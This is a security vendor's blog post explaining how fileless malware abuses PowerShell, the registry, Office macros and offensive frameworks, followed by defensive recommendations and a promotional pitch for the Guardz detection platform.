Malicious Memory: What is Fileless Malware and How Does it Work? 

What is Fileless Malware?

Fileless malware is malicious code that resides in RAM and executes directly from memory rather than being written to the hard drive.

Fileless malware and Living off the Land (LotL) attacks employ similar techniques to manipulate scripts and exploit trusted tools, such as PowerShell, Windows Management Instrumentation (WMI), or RDP sessions, targeting endpoints to execute payloads in memory. 

According to the Ponemon Institute, fileless malware attacks are roughly ten times more likely to succeed than traditional file-based attacks. This is especially concerning for MSPs who manage remote teams with unsecured access to the corporate network, as threat actors can compromise endpoints and multiple cloud environments without triggering any alarms.

In this blog, we’ll explore the common attack techniques, real-world examples, and the defensive strategies you can implement to prevent fileless malware attacks. 

How Does Fileless Malware Work?

Unlike traditional malware that installs files on disk, fileless malware executes directly from scripts or memory, evading signature-based detection and complicating containment efforts. 

PowerShell is a popular tool and attack method because it can run remotely and execute commands directly in memory. For example, an employee might click on a phishing attachment carefully disguised as a trusted Microsoft Word document, which executes malicious macros or embedded scripts on the targeted system. 

That command can then modify registry settings, override security policies, disable event logging, and open pathways for lateral movement across endpoints and servers, without leaving a file-based footprint, persisting in memory until the system is rebooted. By that time, an attacker might have successfully exfiltrated gigabytes or even terabytes of sensitive data.

An attacker can continue to operate in stealth mode, harvesting credentials and escalating admin privileges, while evading detection from traditional antivirus software, which isn’t that effective at preventing conventional forms of malware. Research showed that 20% of all recaptured malware logs had an antivirus program installed at the time of successful malware execution. 

Other forms of fileless malware include reflective DLL injection and reflective EXE self-injection, where attackers run malicious code directly within the memory of a targeted process, bypassing the file system and traditional security defenses.

Fileless attacks are a real challenge for MSPs responsible for securing remote workers, unmanaged devices, and hybrid cloud infrastructure with limited visibility into endpoint activity or access policy permissions for third-party vendors. A malicious PsExec command could be executed on an unmanaged device by leveraging an active admin-level account that was never disabled after a contractor’s agreement ended or an employee left the organization

Types of Fileless Malware Techniques

PowerShell might be considered the most popular attack method, but there are several other techniques to be aware of the next time you perform a cybersecurity risk assessment. 

• Registry-resident malware: Attackers inject malicious code into the Windows Registry by placing commands in registry keys that automatically run when a user logs in or when the system starts, allowing the code to persist in memory. This enables attackers to modify critical registry settings and execute various types of payloads to evade detection and bypass account or system controls. Malicious code can also be written in Python or JavaScript, and typically obfuscated to avoid detection.

• Exploit kits: Open-source PowerShell frameworks, such as Empire and PowerSploit, can be used to manipulate tokens, steal Kerberos tickets, discover network configuration details, modify service binaries, harvest clipboard data, hijack execution flows, log keystrokes, capture screenshots on Windows and macOS systems, and obfuscate files. Although primarily designed for red team exercises and offensive security testing, these tools are frequently repurposed by threat actors to launch fileless malware attacks.

• Macro-based attacks: Microsoft Office documents, written using Visual Basic for Applications (VBA), can contain malicious macros, which are scripts embedded within Word, Excel, or PowerPoint files that often arrive via phishing emails. When a user opens the document, these scripts execute directly in memory, allowing attackers to run payloads, manipulate system settings, or move laterally without any file traces. 

How to Prevent Fileless Malware Attacks 

Set PowerShell script policies and use best practices: PowerShell’s execution policy should be set to RemoteSigned or AllSigned to take precautionary security measures. Avoid hardcoding credentials and limit user permissions by implementing the principle of least privilege access. Sign all scripts with a trusted certificate to ensure authenticity and regularly review and audit scripts for security vulnerabilities. 

Regularly patch and update systems: Ensure that PowerShell, operating systems (OS), and all installed applications are up to date with the latest security patches. Microsoft reported a record 1,360 vulnerabilities in 2024, with Office vulnerabilities increasing by 24%. Don’t overlook those critical software updates. 

Conduct routine phishing simulations: Attackers often leverage trusted Microsoft branding to gain user trust, as seen with the recent Microsoft 365’s Direct Send feature phishing exploit, which delivered spoofed messages appearing as internal emails within the organization. That’s why it’s so essential to conduct regular phishing simulations to educate employees on the common signs of a suspicious email, which might contain a Microsoft Word document with a malicious macro or script attached. 

Implement advanced endpoint detection and response (EDR) tools: Deploy an EDR solution that uses behavioral baselining and analytics to detect indicators of compromise (IOCs) and other risk factors. The EDR should also be able to detect initial ransomware behaviors, like file modifications or encryption patterns, so your security team can prioritize mitigation efforts. 

Secure Your Inbox and Endpoints from Fileless Malware with the Guardz Identity-Centric Unified Platform 

The Guardz AI + human-led MDR provides real-time analysis of process behavior, execution chains, and memory operations to detect fileless attacks. Guardz leverages behavioral AI to mitigate threats in real-time with 24/7 threat detection, triage, and incident response, so your endpoints are thoroughly protected from fileless threats, such as Living off the Land (LOTL) attacks. 

With the Guardz ITDR, threats are correlated to specific user identities and consolidated into a unified incident timeline, enabling clearer context-rich data for more informed decision-making.

Guardz provides one-click automated threat response remediation to isolate users and minimize time to containment. Keep your endpoints and inboxes secured, and prevent fileless malware attacks with Guardz. 

Book a demo today.